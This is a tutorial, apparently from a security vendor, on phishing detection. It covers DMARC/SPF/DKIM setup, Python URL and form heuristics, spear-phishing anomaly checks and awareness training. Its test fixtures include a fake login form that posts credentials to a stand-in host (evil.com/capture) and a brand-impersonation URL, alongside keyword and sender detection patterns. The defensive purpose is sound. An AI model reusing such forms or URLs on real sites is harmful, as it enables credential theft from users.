
Phishing Detection & Prevention -- Email Security & User Awareness

DodaTech Updated 2026-06-23 11 min read

In this tutorial, you'll learn about Phishing Detection & Prevention. We cover key concepts, practical examples, and best practices.

Phishing is a social engineering attack where attackers impersonate legitimate entities via email, SMS, or websites to trick victims into revealing credentials, installing malware, or transferring funds -- responsible for 36% of all data breaches in 2025.

What You'll Learn

You will learn to configure SPF, DKIM, and DMARC to prevent email spoofing, analyze phishing URLs using Python, implement browser-based phishing detection, identify spear phishing indicators, and build a security awareness training program.

Why It Matters

The APWG 2025 Phishing Activity Trends Report recorded over 5 million phishing attacks in 2024, the highest annual total on record. A single successful phishing attack on a privileged user can compromise an entire organization's infrastructure within hours.

Real-World Use

A finance employee receives an email that appears to be from the CEO requesting an urgent wire transfer. The email fails DMARC because it was sent from a server that the company's SPF record does not authorize and carries no valid DKIM signature for the company's domain. The automated security system quarantines the email and alerts the security team before any funds are transferred.

Phishing Attack Flow

flowchart LR
    A[Attacker] --> B[Email Spoofing]
    A --> C[Fake Website]
    A --> D[Social Engineering]
    B --> E[DMARC Check]
    C --> F[URL Analysis]
    D --> G[User Awareness]
    E -->|Fail DMARC| H[Quarantine/Reject]
    E -->|Pass DMARC| I[Deliver]
    F -->|Suspicious URL| J[Block]
    F -->|Clean URL| K[Allow]
    style A fill:#f96,stroke:#333
    style E fill:#4a9,stroke:#333
    style F fill:#4a9,stroke:#333
    style G fill:#4a9,stroke:#333

How it works: Attackers craft emails that appear to come from trusted senders. Email authentication checks whether the message was sent by a server authorized for the sender's domain (SPF) or signed with that domain's key (DKIM), and DMARC additionally requires that domain to match, or align with, the visible From: address. URL analysis inspects links for known phishing indicators. User awareness training helps staff recognize sophisticated social engineering that bypasses technical controls.
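The DMARC decision itself is small enough to sketch. The Python below is a minimal illustration, assuming the receiving server has already produced SPF and DKIM results. The function names are hypothetical, and the two-label "organizational domain" shortcut is an assumption: real receivers use the Public Suffix List.

```python
# Minimal sketch of the DMARC pass/fail decision, assuming the receiving
# server has already evaluated SPF and DKIM. ASSUMPTION: the organizational
# domain is approximated by the last two DNS labels; real receivers use the
# Public Suffix List (so "example.co.uk" is handled correctly).


def org_domain(domain: str) -> str:
    """Naive organizational domain: 'mg.dodatech.com' -> 'dodatech.com'."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, from_domain: str, strict: bool = False) -> bool:
    """Strict alignment needs an exact match; relaxed (the DMARC default) compares organizational domains."""
    if strict:
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_passes(from_domain, spf_result, spf_domain, dkim_result, dkim_domain):
    """DMARC passes if SPF or DKIM passes for a domain aligned with the From: domain."""
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain)
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain)
    return spf_ok or dkim_ok


# Newsletter sent through Mailgun: SPF passes for mailgun.org (not aligned),
# but the DKIM signature uses d=mg.dodatech.com, which aligns in relaxed mode
print(dmarc_passes("dodatech.com", "pass", "bounce.mailgun.org", "pass", "mg.dodatech.com"))  # True

# Spoofed "CEO" email: SPF passes only for the attacker's own domain, no DKIM
print(dmarc_passes("dodatech.com", "pass", "evil.example", "none", ""))  # False
```

The second case is the Real-World Use scenario. The attacker's server can pass SPF for its own domain, but that domain does not align with dodatech.com, so DMARC fails.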

Email Authentication - SPF, DKIM, DMARC

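#!/bin/bash
# Generate SPF, DKIM, and DMARC records for dodatech.com.
# The script only prints the records; publish them at your DNS provider.

# 1. SPF Record - authorize sending servers
echo "SPF Record to add to DNS:"
echo "v=spf1 include:_spf.google.com include:mailgun.org ~all"

# Verify the SPF record (prints nothing until the record is published)
dig TXT dodatech.com +short | grep "v=spf1"
# Expected once published: "v=spf1 include:_spf.google.com include:mailgun.org ~all"

# 2. DKIM Record - sign outgoing emails
# Generate a 2048-bit RSA key pair; the private key stays on the sending mail server
openssl genrsa -out dkim-private.pem 2048
openssl rsa -in dkim-private.pem -pubout -out dkim-public.pem

# Drop the BEGIN/END PUBLIC KEY lines and join the base64 body into one line
PUBKEY=$(grep -v "PUBLIC KEY" dkim-public.pem | tr -d '\n')
echo ""
echo "DKIM DNS Record (selector: default):"
echo "default._domainkey.dodatech.com TXT"
# A 2048-bit key exceeds the 255-character limit of a single TXT string, so
# depending on the DNS provider it may need to be split into several quoted strings
echo "\"v=DKIM1; h=sha256; k=rsa; p=$PUBKEY\""

# 3. DMARC Policy - enforce authentication
echo ""
echo "DMARC Record to add to DNS:"
echo "_dmarc.dodatech.com TXT"
echo "\"v=DMARC1; p=quarantine; rua=mailto:dmarc@dodatech.com; ruf=mailto:dmarc-forensic@dodatech.com; pct=100; fo=1\""

# 4. Verify the published DMARC and DKIM records (no output until they exist)
dig TXT _dmarc.dodatech.com +short
dig TXT default._domainkey.dodatech.com +short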

Expected output:

SPF Record to add to DNS:
v=spf1 include:_spf.google.com include:mailgun.org ~all

DKIM DNS Record (selector: default):
default._domainkey.dodatech.com TXT
"v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA..."

DMARC Record to add to DNS:
_dmarc.dodatech.com TXT
"v=DMARC1; p=quarantine; rua=mailto:dmarc@dodatech.com; ..."

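Expected behavior: SPF lists the servers authorized to send email for the domain (~all marks mail from any other server as a soft fail). DKIM signs outgoing emails with the private key so recipients can use the public key in DNS to verify that the message was not altered in transit. DMARC tells receiving servers what to do when a message passes neither SPF nor DKIM for a domain aligned with the From: address. The p=quarantine setting asks them to treat such mail as suspicious, typically by delivering it to the spam folder.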
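The DMARC record printed by the script is a semicolon-separated list of tag=value pairs. The following is a minimal Python sketch that parses such a record and flags weak settings, such as the p=none policy discussed under Common Errors. The function names and warning rules are illustrative assumptions, not part of the DMARC specification or of any tool.

```python
# Minimal sketch: parse a DMARC TXT record into tags and flag weak settings.
# The warning rules below are illustrative assumptions.


def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=quarantine; ...' into {'v': 'DMARC1', 'p': 'quarantine', ...}."""
    tags = {}
    for part in record.strip().strip('"').split(";"):
        if "=" in part:
            key, value = part.split("=", 1)  # split once: values such as mailto: URIs are kept whole
            tags[key.strip().lower()] = value.strip()
    return tags


def review_dmarc(record: str) -> list:
    """Return human-readable warnings about a DMARC record (empty list if none)."""
    tags = parse_dmarc(record)
    warnings = []
    if tags.get("v") != "DMARC1":
        warnings.append("Missing or invalid v=DMARC1 tag")
    policy = tags.get("p")
    if policy not in {"none", "quarantine", "reject"}:
        warnings.append(f"Invalid or missing policy: {policy}")
    elif policy == "none":
        warnings.append("p=none only monitors; spoofed mail is still delivered")
    if int(tags.get("pct", "100")) < 100:
        warnings.append(f"Policy applies to only {tags['pct']}% of failing mail")
    if "rua" not in tags:
        warnings.append("No rua= address; you will not receive aggregate reports")
    return warnings


record = ("v=DMARC1; p=quarantine; rua=mailto:dmarc@dodatech.com; "
          "ruf=mailto:dmarc-forensic@dodatech.com; pct=100; fo=1")
print(parse_dmarc(record)["p"])   # quarantine
print(review_dmarc(record))       # []
print(review_dmarc("v=DMARC1; p=none"))
```

Running review_dmarc against the output of dig TXT _dmarc.<domain> +short is one way to catch a policy that was left at p=none.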

Phishing URL Analysis

import re
import tldextract
from urllib.parse import urlparse

class PhishingURLDetector:
    SUSPICIOUS_TLDS = {
        ".tk", ".ml", ".ga", ".cf", ".gq",
        ".xyz", ".top", ".loan", ".click",
    }

    BRAND_KEYWORDS = {
        "google", "facebook", "amazon", "paypal", "apple",
        "microsoft", "netflix", "instagram", "linkedin",
        "dodatech", "dropbox", "github",
    }

    def analyze_url(self, url):
        parsed = urlparse(url)
        extracted = tldextract.extract(url)
        indicators = []
        risk_score = 0

        # Check for IP address instead of domain name
        if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", extracted.domain):
            indicators.append("IP address used instead of domain name")
            risk_score += 30

        # Check for suspicious TLDs
        if f".{extracted.suffix}" in self.SUSPICIOUS_TLDS:
            indicators.append(f"Suspicious TLD: .{extracted.suffix}")
            risk_score += 25

        # Check for brand keywords in unusual positions
        domain = extracted.domain.lower()
        subdomain = extracted.subdomain.lower()
        for brand in self.BRAND_KEYWORDS:
            if brand in domain and brand != domain:
                # Brand embedded in another registered domain (e.g., paypal-secure.com)
                indicators.append(f"Brand impersonation: {brand}")
                risk_score += 40
            elif brand in subdomain and brand != domain:
                # Brand placed in front of an unrelated domain (e.g., paypal.com.login.evil.com)
                indicators.append(f"Brand in subdomain of another domain: {brand}")
                risk_score += 40
            if brand in parsed.path.lower():
                indicators.append(f"Brand keyword in path: {brand}")
                risk_score += 15

        # Check for deep subdomains (e.g., login.security.google.com.evil.com)
        subdomain_labels = [label for label in subdomain.split(".") if label]
        if len(subdomain_labels) >= 3:
            indicators.append("Excessive subdomain depth")
            risk_score += 20

        # Check for URL shorteners
        shorteners = {"bit.ly", "tinyurl.com", "t.co", "ow.ly", "is.gd"}
        if extracted.registered_domain in shorteners:
            indicators.append("URL shortener - destination hidden")
            risk_score += 10

        return {
            "url": url,
            "risk_score": risk_score,
            "risk_level": "HIGH" if risk_score >= 50 else "MEDIUM" if risk_score >= 20 else "LOW",
            "indicators": indicators,
        }

detector = PhishingURLDetector()
urls = [
    "https://www.google.com",
    "https://paypal.com.login.evil.com/verify/account",
    "https://192.168.1.1/login",
    "https://bit.ly/3xP9kQm",
]

for url in urls:
    result = detector.analyze_url(url)
    print(f"{result['risk_level']:6s}: {result['risk_score']:2d} pts - {url}")

Expected output:

LOW   :  0 pts - https://www.google.com
HIGH  : 60 pts - https://paypal.com.login.evil.com/verify/account
MEDIUM: 30 pts - https://192.168.1.1/login
LOW   : 10 pts - https://bit.ly/3xP9kQm

Expected behavior: The detector assigns risk scores based on multiple phishing indicators. The PayPal impersonation URL scores highest: it earns 40 points because the brand name sits in the subdomain of the unrelated domain evil.com, plus 20 points for three subdomain labels. The raw IP address earns a MEDIUM rating. The shortener gets only a small 10-point bump (LOW) because it hides the destination rather than proving it malicious.
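The detector above only recognizes a brand when the exact keyword appears, so lookalike registrations such as paypa1.com or go0gle.com slip through. One way to catch them is to undo common digit-for-letter swaps and then measure edit distance to each protected brand. This is sketched here as an assumption rather than as part of the original detector. The substitution table, the brand set, and the distance threshold of 1 are illustrative choices.

```python
# Hypothetical lookalike-domain check (not part of PhishingURLDetector):
# undo common digit-for-letter swaps, then compare to protected brand names.

SUBSTITUTIONS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})
PROTECTED_BRANDS = {"amazon", "dodatech", "google", "microsoft", "paypal"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance counting single-character inserts, deletes, and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def lookalike_of(label: str, max_distance: int = 1):
    """Return the brand that `label` imitates, or None for exact brands and unrelated names."""
    label = label.lower()
    if label in PROTECTED_BRANDS:
        return None  # the real brand name itself
    normalized = label.translate(SUBSTITUTIONS)
    for brand in sorted(PROTECTED_BRANDS):
        if levenshtein(normalized, brand) <= max_distance:
            return brand
    return None


for label in ["google", "go0gle", "paypa1", "amaz0nn", "weather"]:
    print(f"{label:8s} -> {lookalike_of(label)}")
```

Apply it to the domain part that tldextract returns (for example, paypa1 from paypa1.com). A larger max_distance catches more lookalikes but also flags more legitimate names. Unicode homoglyphs in internationalized (punycode) domains would need a separate confusables table.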

Credential Phishing Detection with Heuristic Rules

import re
from urllib.parse import urlparse

class CredentialPhishingDetector:
    PHISHING_KEYWORDS = {
        "verify", "confirm", "update", "unlock", "suspend",
        "restrict", "deactivate", "security alert", "unauthorized",
        "suspicious activity", "login attempt", "reset password",
    }

    # Sender-address patterns for email-level checks (not used by analyze_form_page)
    FAKE_SENDER_PATTERNS = [
        r"no.reply@[a-z]+-secure\.com",
        r"support@[a-z]+\.[a-z]{2,3}\.[a-z]{2,3}",
        r"admin@[a-z]+\d+\.com",
        r"security@[a-z]+-help\.\w+",
    ]

    def __init__(self):
        self.phishing_forms = 0

    def analyze_form_page(self, html_content, page_url):
        indicators = []
        html_lower = html_content.lower()
        page_host = urlparse(page_url).hostname if page_url else None

        # Check for password forms that submit to a different host than the page
        has_password = re.search(r'type=["\']password["\']', html_lower) is not None
        action_matches = re.findall(r'action=["\'](https?://[^"\']+)["\']', html_lower)
        for action in action_matches:
            action_host = urlparse(action).hostname
            if has_password and page_host and action_host != page_host:
                indicators.append(f"Form submits to different domain: {action_host}")
                self.phishing_forms += 1

        # Check for urgency keywords in form context ("multiple" means two or more)
        keyword_count = sum(1 for keyword in self.PHISHING_KEYWORDS if keyword in html_lower)
        if keyword_count >= 2:
            indicators.append(f"Multiple urgency keywords: {keyword_count}")

        # Check for hidden fields (a few, such as a CSRF token, are normal)
        hidden_inputs = re.findall(r'<input[^>]*type=["\']hidden["\'][^>]*>', html_lower)
        if len(hidden_inputs) > 3:
            indicators.append(f"Excessive hidden fields: {len(hidden_inputs)}")

        return {
            "is_phishing": len(indicators) > 0,
            "indicators": indicators,
            "confidence": min(len(indicators) * 25, 100),
        }

detector = CredentialPhishingDetector()
legitimate_form = """
<form action="/login" method="POST">
  <input type="text" name="username">
  <input type="password" name="password">
  <button type="submit">Sign In</button>
</form>
"""

phishing_form = """
<form action="https://evil.com/capture" method="POST">
  <input type="hidden" name="redirect" value="https://real.com">
  <input type="hidden" name="campaign" value="urgent">
  <input type="text" name="email">
  <input type="password" name="pass">
  <button type="submit">Verify Account Now</button>
  <p>Your account will be suspended if you do not verify.</p>
</form>
"""

result_legit = detector.analyze_form_page(legitimate_form, "https://real.com/login")
result_phish = detector.analyze_form_page(phishing_form, "https://real.com/login")

print(f"Legitimate form - Phishing: {result_legit['is_phishing']}, Confidence: {result_legit['confidence']}%")
print(f"Phishing form   - Phishing: {result_phish['is_phishing']}, Confidence: {result_phish['confidence']}%")
for indicator in result_phish["indicators"]:
    print(f"  Indicator: {indicator}")

Expected output:

Legitimate form - Phishing: False, Confidence: 0%
Phishing form   - Phishing: True, Confidence: 50%
  Indicator: Form submits to different domain: evil.com
  Indicator: Multiple urgency keywords: 2

Expected behavior: The detector identifies credential phishing forms by checking form submission targets against the page origin, urgency language, and hidden field abuse. The phishing form submits credentials to a different domain (evil.com) and uses urgency language.
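The regex checks above only see absolute http(s) action URLs and cannot tell which inputs belong to which form. A sturdier variant, sketched here as an alternative approach, parses the HTML with the standard-library html.parser and resolves each form's action against the page URL with urllib.parse.urljoin. The class and function names are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Records each <form>'s action and whether a password <input> appears inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []       # one {"action": str, "has_password": bool} per form
        self.in_form = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # attribute values may be None, e.g. <input disabled>
        if tag == "form":
            self.forms.append({"action": attrs.get("action") or "", "has_password": False})
            self.in_form = True
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.forms[-1]["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def cross_origin_credential_forms(html, page_url):
    """Return the hosts that receive password forms served from a different host."""
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    page_host = urlparse(page_url).hostname
    suspicious = []
    for form in collector.forms:
        # Relative or empty actions resolve against the page URL, i.e. the same host
        target_host = urlparse(urljoin(page_url, form["action"])).hostname
        if form["has_password"] and target_host != page_host:
            suspicious.append(target_host)
    return suspicious


phish = '<form action="https://evil.com/capture"><input type="password" name="pass"></form>'
legit = '<FORM ACTION="/login"><input type=password name="password"></FORM>'
print(cross_origin_credential_forms(phish, "https://real.com/login"))  # ['evil.com']
print(cross_origin_credential_forms(legit, "https://real.com/login"))  # []
```

Because HTMLParser lowercases tag and attribute names and accepts unquoted values, the uppercase, unquoted legitimate form is still parsed correctly.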

Spear Phishing Defense

from datetime import datetime

class SpearPhishingAnalyzer:
    def __init__(self, user_communication_history):
        self.history = user_communication_history

    def analyze_email_anomalies(self, email):
        anomalies = []

        # Check if sender has communicated before
        known_senders = {h["sender"] for h in self.history}
        if email["sender"] not in known_senders:
            anomalies.append("First-time sender")

        # Check if request is unusual for this sender
        sender_history = [
            h for h in self.history
            if h["sender"] == email["sender"]
        ]
        if sender_history:
            # Analyze request types
            historical_requests = set()
            for h in sender_history:
                historical_requests.update(h.get("request_types", []))

            if email.get("request_type") and \
               email["request_type"] not in historical_requests:
                anomalies.append(
                    f"Unusual request type: {email['request_type']}"
                )

        # Check for urgency language
        urgency_indicators = [
            "urgent", "immediately", "as soon as possible",
            "right away", "deadline", "overdue", "suspended",
        ]
        text_lower = email.get("body", "").lower()
        urgent_words = [
            w for w in urgency_indicators if w in text_lower
        ]
        if urgent_words:
            anomalies.append(f"Urgency language detected: {urgent_words}")

        # Check for unusual sending time: treat the window between the earliest
        # and latest hour seen from this sender as normal (matching exact hours
        # would flag almost every new email)
        hour = datetime.fromisoformat(email["timestamp"]).hour
        sender_hours = [
            datetime.fromisoformat(h["timestamp"]).hour
            for h in sender_history
        ]
        if sender_hours and not (min(sender_hours) <= hour <= max(sender_hours)):
            anomalies.append(f"Unusual sending time: {hour}:00")

        return {
            "email_id": email.get("id"),
            "anomaly_count": len(anomalies),
            "anomalies": anomalies,
            "requires_review": len(anomalies) >= 2,
        }

history = [
    {
        "sender": "ceo@company.com",
        "timestamp": "2026-06-20T09:30:00",
        "request_types": ["meeting", "report"],
    },
    {
        "sender": "ceo@company.com",
        "timestamp": "2026-06-21T14:00:00",
        "request_types": ["feedback"],
    },
]

analyzer = SpearPhishingAnalyzer(history)

normal_email = {
    "id": "msg-001",
    "sender": "ceo@company.com",
    "timestamp": "2026-06-22T10:00:00",
    "request_type": "meeting",
    "body": "Can we schedule a team meeting for Friday?",
}

suspicious_email = {
    "id": "msg-002",
    "sender": "ceo@company.com",
    "timestamp": "2026-06-23T03:15:00",
    "request_type": "wire_transfer",
    "body": "I need you to process an urgent wire transfer of $50,000 immediately. I am in a meeting and cannot do it myself.",
}

for email in [normal_email, suspicious_email]:
    result = analyzer.analyze_email_anomalies(email)
    print(f"Email {result['email_id']}: {result['anomaly_count']} anomalies, Review: {result['requires_review']}")
    for a in result["anomalies"]:
        print(f"  - {a}")

Expected output:

Email msg-001: 0 anomalies, Review: False
Email msg-002: 3 anomalies, Review: True
  - Unusual request type: wire_transfer
  - Urgency language detected: ['urgent', 'immediately']
  - Unusual sending time: 3:00

Expected behavior: The spear phishing analyzer flags the suspicious email because the CEO has never requested a wire transfer before, the email arrives at 3 AM, and it contains urgency language. With three anomalies, requires_review is True, so the request is flagged for manual review before any funds are transferred.

Security Awareness Training

#!/bin/bash
# Automated phishing simulation and training

echo "=== Security Awareness Training Program ==="

# Schedule simulated phishing campaigns
cat > phishing_campaign.yaml << 'EOF'
campaigns:
  - name: "Q3 Credential Phishing Test"
    template: "urgent_password_reset"
    frequency: "monthly"
    targets: "all_employees"
    action: "report_to_security"

  - name: "Q3 Spear Phishing Test"
    template: "ceo_urgent_request"
    frequency: "quarterly"
    targets: "finance_dept"
    action: "verify_out_of_band"

  - name: "Q3 Smishing Test"
    template: "package_delivery"
    frequency: "quarterly"
    targets: "all_employees"
    action: "report_sms_to_security"
EOF

echo "Campaign templates loaded: $(grep -c '^  - name:' phishing_campaign.yaml)"
echo ""

# Track employee training completion
cat > training_tracker.py << 'PYEOF'
# Report training-module completion for each employee

training_modules = [
    {
        "name": "Phishing Basics",
        "duration_minutes": 15,
        "topics": ["Email spoofing", "URL inspection", "Report button usage"],
    },
    {
        "name": "Spear Phishing Awareness",
        "duration_minutes": 20,
        "topics": ["Social engineering tactics", "CEO fraud", "Vendor compromise"],
    },
    {
        "name": "Mobile Phishing (Smishing)",
        "duration_minutes": 10,
        "topics": ["SMS phishing", "QR code phishing", "App impersonation"],
    },
]

employees = [
    {"id": "EMP-001", "name": "Alice", "completed": ["Phishing Basics", "Spear Phishing Awareness"]},
    {"id": "EMP-002", "name": "Bob", "completed": ["Phishing Basics"]},
    {"id": "EMP-003", "name": "Charlie", "completed": []},
]

print(f"Training modules available: {len(training_modules)}")
print(f"Employees enrolled: {len(employees)}")
print("")

for emp in employees:
    completed_pct = len(emp["completed"]) / len(training_modules) * 100
    missing = [m["name"] for m in training_modules if m["name"] not in emp["completed"]]
    print(f"{emp['name']:10s}: {completed_pct:3.0f}% complete - Missing: {', '.join(missing) or 'None'}")
PYEOF

python3 training_tracker.py

Expected output:

=== Security Awareness Training Program ===
Campaign templates loaded: 3
Training modules available: 3
Employees enrolled: 3

Alice     :  67% complete - Missing: Mobile Phishing (Smishing)
Bob       :  33% complete - Missing: Spear Phishing Awareness, Mobile Phishing (Smishing)
Charlie   :   0% complete - Missing: Phishing Basics, Spear Phishing Awareness, Mobile Phishing (Smishing)

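Expected behavior: The training program schedules simulated phishing campaigns aimed at different groups (all employees, or only the finance department) and reports each employee's module completion. The script does not assign remedial training itself; in a full program, employees who fail phishing simulations would also be assigned remedial training.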
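The tracker above only reports module completion, and nothing in it acts on simulation results. The following hedged sketch shows one way the remedial-training step could work. The results format (who clicked, who reported) and the rule "clicked without reporting means remedial training" are assumptions for illustration, not features of any particular simulation platform.

```python
# Hypothetical simulation results: one entry per employee per campaign.
results = [
    {"employee": "Alice",   "campaign": "Q3 Credential Phishing Test", "clicked": False, "reported": True},
    {"employee": "Bob",     "campaign": "Q3 Credential Phishing Test", "clicked": True,  "reported": False},
    {"employee": "Charlie", "campaign": "Q3 Credential Phishing Test", "clicked": True,  "reported": True},
]


def summarize(results):
    """Compute click and report rates and list employees needing follow-up training."""
    total = len(results)
    clicked = sum(r["clicked"] for r in results)    # True counts as 1
    reported = sum(r["reported"] for r in results)
    # Assumed rule: clicking without reporting earns a short remedial module;
    # clicking and then reporting is treated as a teaching moment instead.
    remedial = [r["employee"] for r in results if r["clicked"] and not r["reported"]]
    return {
        "click_rate": round(100 * clicked / total, 1),
        "report_rate": round(100 * reported / total, 1),
        "remedial": remedial,
    }


summary = summarize(results)
print(f"Click rate:  {summary['click_rate']}%")
print(f"Report rate: {summary['report_rate']}%")
print(f"Remedial training: {', '.join(summary['remedial']) or 'None'}")
```

With this sample data, the sketch reports a 66.7% click rate and a 66.7% report rate, and assigns remedial training only to Bob. Tracking the report rate alongside the click rate keeps the simulations educational rather than punitive.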

Common Errors

  1. DMARC policy set to p=none indefinitely -- Many organizations set DMARC to p=none to monitor without enforcement but never progress to p=quarantine or p=reject. Attackers can still spoof the domain. Review DMARC reports monthly and tighten the policy.

  2. Relying solely on spam filters for phishing protection -- Spam filters catch bulk phishing but miss targeted spear phishing. Combine technical controls (DMARC, URL filtering) with user awareness training for defense in depth.

  3. Users not trained to verify unusual requests out-of-band -- A spear phishing email appears to come from the CEO requesting a wire transfer. The employee should verify by calling the CEO directly using a known phone number, not by replying to the email.

  4. No reporting mechanism for suspicious emails -- Users who spot a phishing email have no easy way to report it, so the security team never learns about it and other employees continue to receive and act on the same email. Implement a PhishAlert button that forwards the email to the security team for analysis.

  5. Simulated phishing used punitively rather than educationally -- Employees who click simulated phishing links are punished rather than trained. This discourages reporting real phishing emails. Use simulations as teaching opportunities with immediate in-the-moment training.

Practice Questions

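  1. What does DMARC policy p=reject do? DMARC p=reject instructs receiving mail servers to reject emails that fail DMARC, meaning that neither SPF nor DKIM passed for a domain aligned with the From: address. The email is not delivered to the recipient's inbox or spam folder. At receivers that enforce DMARC, this stops attackers from spoofing your exact domain, but it does not stop lookalike domains or display name spoofing.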

  2. How can you identify a spear phishing email targeting executives? Spear phishing indicators include unusual sending times, requests outside the sender's normal role, urgency language, and requests that bypass normal approval processes. Verify all unusual requests through out-of-band communication.

  3. Why should you never click links in unsolicited emails even if the sender looks legitimate? Links can point to fake websites that look identical to the real site. Attackers register lookalike domains (go0gle.com, paypa1.com) and serve credential harvesting pages. Always type the URL directly into the browser.

  4. What is the difference between phishing and spear phishing? Phishing is a mass email sent to many recipients with generic content. Spear phishing targets specific individuals with personalized content using information gathered from social media, data breaches, or reconnaissance.

  5. Challenge: Build a phishing detection dashboard that reads email headers, checks SPF/DKIM/DMARC authentication results, extracts and analyzes URLs, and calculates a composite phishing risk score. Test it against real phishing samples from PhishTank.
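For the first step of the challenge, receiving mail servers commonly record their SPF, DKIM, and DMARC verdicts in an Authentication-Results header (RFC 8601). The following is a minimal sketch using Python's standard email package. The sample message, the server name mx.example.net, and the simple regex parsing are assumptions. A production parser should follow the full RFC 8601 grammar, including comments and multiple results for the same method.

```python
import re
from email import message_from_string

RAW = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=bounce.mailgun.org;
 dkim=pass header.d=dodatech.com;
 dmarc=pass header.from=dodatech.com
From: CEO <ceo@dodatech.com>
Subject: Quarterly report

Body text.
"""


def auth_results(raw_message: str, trusted_authserv_id: str) -> dict:
    """Extract spf/dkim/dmarc verdicts from headers added by our own mail server."""
    msg = message_from_string(raw_message)
    verdicts = {}
    for header in msg.get_all("Authentication-Results", []):
        authserv_id = header.split(";", 1)[0].strip()
        if authserv_id != trusted_authserv_id:
            continue  # a sender can forge this header, so ignore other servers' copies
        # Matches tokens such as 'spf=pass', 'dkim=fail', 'dmarc=none'
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header):
            verdicts.setdefault(method, result)  # keep the topmost (most recent) verdict
    return verdicts


print(auth_results(RAW, "mx.example.net"))  # {'spf': 'pass', 'dkim': 'pass', 'dmarc': 'pass'}
```

These verdicts, combined with URL scores from the detectors above, could feed the composite risk score the challenge asks for.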

Mini Project

Configure DMARC for a personal domain starting with p=none monitoring. Collect DMARC aggregate reports for 30 days. Analyze the reports to identify all legitimate sending sources. Tighten SPF to include only authorized senders. Progress DMARC policy to p=quarantine, then p=reject. Build an automated URL scanner that checks links against known phishing databases.
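To identify legitimate sending sources from the aggregate (rua) reports, you can total message counts per source IP. The following sketch uses xml.etree.ElementTree on a trimmed sample that follows the aggregate-report element names from RFC 7489 (feedback, record, row, source_ip, count, policy_evaluated). The IP addresses are documentation examples. Real reports arrive as zip or gzip attachments that must be extracted first, and they also include report_metadata and policy_published sections.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Trimmed sample aggregate report (hypothetical data)
SAMPLE_REPORT = """<feedback>
  <record>
    <row>
      <source_ip>192.0.2.10</source_ip>
      <count>120</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>dodatech.com</header_from></identifiers>
  </record>
  <record>
    <row>
      <source_ip>198.51.100.7</source_ip>
      <count>3</count>
      <policy_evaluated><disposition>quarantine</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>dodatech.com</header_from></identifiers>
  </record>
</feedback>"""


def summarize_sources(xml_text: str) -> dict:
    """Total messages per source IP, split into DMARC pass and fail."""
    totals = defaultdict(lambda: {"pass": 0, "fail": 0})
    root = ET.fromstring(xml_text)
    for row in root.iter("row"):
        ip = row.findtext("source_ip")
        count = int(row.findtext("count", default="0"))
        dkim = row.findtext("policy_evaluated/dkim")
        spf = row.findtext("policy_evaluated/spf")
        # policy_evaluated holds the DMARC-aligned results, so either pass means DMARC pass
        verdict = "pass" if "pass" in (dkim, spf) else "fail"
        totals[ip][verdict] += count
    return dict(totals)


for ip, counts in summarize_sources(SAMPLE_REPORT).items():
    print(f"{ip:15s} pass={counts['pass']:4d} fail={counts['fail']:4d}")
```

A source that mostly passes is likely a legitimate sender to keep in SPF and DKIM. A source that only fails is either a spoofer or a forgotten service, and it should be investigated before moving to p=quarantine.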

FAQ

What should I do if I clicked a phishing link?

Disconnect from the internet immediately. Run a full antivirus scan using Durga Antivirus Pro. Using a different, clean device, change passwords for all accounts accessed from the affected device. Enable MFA on all accounts. Report the incident to your security team.

How do phishers get my email address?

Email addresses are collected from data breaches, public sources (social media, company websites, forum posts), purchased on dark web marketplaces, or guessed using common name patterns. Use email aliases for different services to track which source leaks data.

Can DMARC prevent all email spoofing?

DMARC prevents exact-domain spoofing but does not prevent lookalike domain registration (dodatech-security.com vs dodatech.com). DMARC also does not prevent display name spoofing, where the sender name is forged (for example, the CEO's name) but the address belongs to a different domain that can pass its own SPF, DKIM, and DMARC checks.
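Display name spoofing can be screened with a simple rule: flag mail whose display name matches a protected person while the address belongs to an outside domain. The following is a minimal sketch using email.utils.parseaddr from the standard library. The protected names and the internal domain are hypothetical values.

```python
from email.utils import parseaddr

# Hypothetical values: replace with your own executives and domain
PROTECTED_NAMES = {"jane doe", "john smith"}
INTERNAL_DOMAIN = "dodatech.com"


def is_display_name_spoof(from_header: str) -> bool:
    """Flag a protected display name paired with an address outside the internal domain."""
    name, address = parseaddr(from_header)
    domain = address.rpartition("@")[2].lower()
    internal = domain == INTERNAL_DOMAIN or domain.endswith("." + INTERNAL_DOMAIN)
    return name.strip().lower() in PROTECTED_NAMES and not internal


print(is_display_name_spoof('"Jane Doe" <jane.doe@dodatech.com>'))   # False
print(is_display_name_spoof('"Jane Doe" <ceo.office@example.net>'))  # True
print(is_display_name_spoof('"Support" <help@example.net>'))         # False
```

This rule also catches lookalike domains such as dodatech-security.com when they carry a protected name. It can produce false positives when executives legitimately write from personal accounts, so pairing it with a warning banner usually works better than rejecting the message outright.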

Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.
